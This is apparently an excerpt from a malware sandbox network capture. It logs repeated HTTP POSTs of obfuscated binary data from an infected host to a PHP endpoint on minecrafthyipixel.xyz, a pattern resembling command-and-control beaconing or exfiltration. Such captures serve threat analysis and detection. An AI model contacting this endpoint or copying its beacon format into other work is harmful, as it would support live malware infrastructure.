                                                                                                                                    Apr 19, 2024 13:44:20.720957041 CEST2512OUTData Raw: 57 5b 5b 59 59 45 54 5f 5c 5e 59 59 57 53 58 59 54 52 5f 5d 54 5d 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[YYET_\^YYWSXYTR_]T]SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2>&W"$0#]$+=8<1$;%!"6P=^ ?8]:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:20.983758926 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D4lxsrPr7sZw2BcwfkDvPPs58%2FMkzxRDizZ3V8fKh05HECEP7An1zJvEihFj8D7o4ao2oOBmA%2BajIPGAtWidPCcSiu7Qnl%2B88QfppF2X3jiHF5pWKxICYurSaoZFeOLsAnztJ6OoggE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4613f8053f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:20.983819008 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    167192.168.2.449921104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:21.209007025 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:21.313824892 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:21.313988924 CEST2512OUTData Raw: 52 59 5b 5b 5c 41 54 5a 5c 5e 59 59 57 5e 58 58 54 54 5f 59 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[[\ATZ\^YYW^XXTT_YT_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'="S6]$[& _0+6?(7\'91.W#""V*;\7?$Z.$[. X
                                                                                                                                    Apr 19, 2024 13:44:21.570853949 CEST613INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:21 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oivfT7dp6AaJr1lPB0yJiCe0dAMj79lgplsBnaGXhYJNFhqBh0pZOqe8hmdPuAW3Fbxwr8Oo1nWZTHdYczLuBaM8jNSIn144HRmr1RKH7PyZ08ZrKc5hWfrf4WRWtqktHhJfnKxiBp0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca464eac64533-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:21.570915937 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    168192.168.2.449922104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:21.799875021 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:21.905078888 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:21.905301094 CEST2504OUTData Raw: 57 59 5e 5c 5c 44 54 59 5c 5e 59 59 57 57 58 5f 54 51 5f 5f 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^\\DTY\^YYWWX_TQ__TXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1=55;?& ;['-T)'1_3%(" Q>+4#?0Z:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:22.161755085 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvDLrOzmoaj5tuN3xPBODdHMelzmuxY13J54%2BKkUchhKTBiP3l7yCOJThELyDLTL4RZ8mYBYGw57d0QAxoX3kvYgr%2FpBonG%2FBbV%2BSOgbejS5gAoSau2D8wPlI5F8fYfXR1c3YeGucg8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4689aecad6e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:22.161809921 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    169192.168.2.449923104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:22.395687103 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:22.500221968 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:22.500366926 CEST2512OUTData Raw: 57 5c 5b 59 59 42 51 58 5c 5e 59 59 57 54 58 5f 54 54 5f 5b 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[YYBQX\^YYWTX_TT_[T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1>V6;70\'1P)^ '*$U2;6V7%) ?0-5$[. X )
                                                                                                                                    Apr 19, 2024 13:44:22.758943081 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BLj%2By2NlN1OjEdKeAy%2BCnZ9pqFq3Pm8DmGFfvFUZA3afnRk2RfSOUkycysJcGzKJa9Cme8fwciynUUkKiDNtaNM7o3c3zswamiVwsUpoMyBrRznHVfmgR9WARW0F6gwp0vp0EIax4C4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca46c4a297bd6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:22.759006023 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    170192.168.2.449924104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:22.991090059 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:23.096529961 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:23.096766949 CEST2512OUTData Raw: 57 5c 5e 55 59 42 54 5d 5c 5e 59 59 57 52 58 5f 54 52 5f 59 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^UYBT]\^YYWRX_TR_YT^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]'.5"+X$ ;Z0==+'_2U185!2W*+,#//-$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:23.361951113 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCiWDj2qWJBGHhkevK0rA2xGyjy1iAg%2FKMKj8DnDB5hxfEzo111P97OJA2gvkqHa%2F43ZshKC4O83s5v%2FD0gr%2BuQrWfKR70CHAbEYZkCXPEkJNLNN9Z3POb3RDyxS5RsbHfGq%2FwUGc%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca470087b06e6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:23.362014055 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    171192.168.2.449925104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:23.599805117 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:23.706543922 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:23.706904888 CEST2512OUTData Raw: 57 5b 5b 5e 59 4a 54 5b 5c 5e 59 59 57 50 58 5b 54 55 5f 5e 54 54 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[^YJT[\^YYWPX[TU_^TTSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-*S"?$#;_$*=^(1:,S%)71)877<#:%$[. X


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    172192.168.2.449926104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:23.894087076 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:23.998959064 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:23.999355078 CEST2192OUTData Raw: 52 5d 5e 5d 59 42 54 55 5c 5e 59 59 57 56 58 5a 54 5b 5f 5c 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^]YBTU\^YYWVXZT[_\T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>2R ;'&0#Z%;1*8% T1>R#2-+; /$-$[. X !
                                                                                                                                    Apr 19, 2024 13:44:24.268405914 CEST764INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oz6I%2BBS6Gwwbm9nHe2rAnGiBc5IRBlxlRIxYWF97WqMwFDJgRlgmCW5wFKu8MorxXyubcSF5dk3yfcVsfkQOhYcJ6ZviVY8obc9Gm6u2VRXeAw5910oswNfIehxUzZGBtq0jMAo2jjg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca475aa40b062-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5e 24 26 31 05 21 03 3f 5a 3d 1d 26 11 2a 0e 22 06 3e 39 26 05 37 3e 38 1f 2f 39 3b 04 3f 05 21 07 25 23 29 52 30 5b 24 18 31 1a 21 59 00 1a 39 5c 34 3c 3e 04 2e 39 0c 01 3c 31 22 00 20 0b 2f 5a 28 2e 29 50 34 38 01 5c 3d 2e 21 51 2d 28 24 57 2b 38 35 18 2d 24 31 07 36 01 2c 52 09 12 25 53 2b 01 3c 13 26 30 0b 50 22 21 34 10 3c 3f 22 58 24 38 30 51 32 1d 23 05 3a 0b 32 55 32 07 39 53 3d 04 24 56 23 2f 2a 0f 25 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$^$&1!?Z=&*">9&7>8/9;?!%#)R0[$1!Y9\4<>.9<1" /Z(.)P48\=.!Q-($W+85-$16,R%S+<&0P"!4<?"X$80Q2#:2U29S=$V#/*%.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:24.268465996 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    173192.168.2.449927104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:24.014947891 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:24.121318102 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:24.121577024 CEST2512OUTData Raw: 57 59 5b 5c 59 46 51 59 5c 5e 59 59 57 52 58 5b 54 51 5f 59 54 5a 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY[\YFQY\^YYWRX[TQ_YTZS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1X>5((['34$P=;&?1;*Q 2T>#8/5$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:24.394393921 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ze3Dlbh8mUJfaXwZWLfk9L7unqgWH5ATRdMl1kdKZhGIu5kuh0Js7PFtJhScKN%2BmdMxO9CjC3UMtnNSFrnHyzCHqqSxJY%2Bo%2B08bz2I2kTECzaxrzPjxIn2aKvpfurP7voOvE2LscirE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4766c7944d7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:24.394457102 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    174192.168.2.449928104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:24.626636982 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:24.730777025 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:24.730927944 CEST2512OUTData Raw: 57 59 5b 5c 59 45 54 5a 5c 5e 59 59 57 56 58 5f 54 5b 5f 56 54 5c 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY[\YETZ\^YYWVX_T[_VT\S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>=68$\$ #^%;-U>8$%<R&]17T)+8?\ <^-%$[. X !
                                                                                                                                    Apr 19, 2024 13:44:24.990322113 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2ForuPDleb7ChUoIFd4fS8DvwOS4du80YSs4tQSK9yD4%2BIprDHZnAtiJxmeLQWuuc012PQSRoFXH8CMNBI9icsHZ7y2zfXT5u2hR%2FAzuNU%2BowTuaplHrVvAsWUuE4ypC01moNb8eQ%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca47a4aaab02a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:24.990385056 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    175192.168.2.449929104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:25.215707064 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:25.320271015 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:25.320374012 CEST2504OUTData Raw: 57 5b 5b 5c 59 45 54 5a 5c 5e 59 59 57 57 58 5e 54 55 5f 5e 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YETZ\^YYWWX^TU_^T^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.55;$7$+&=3_&#2=!2*];[",,Z:%$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:25.589507103 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
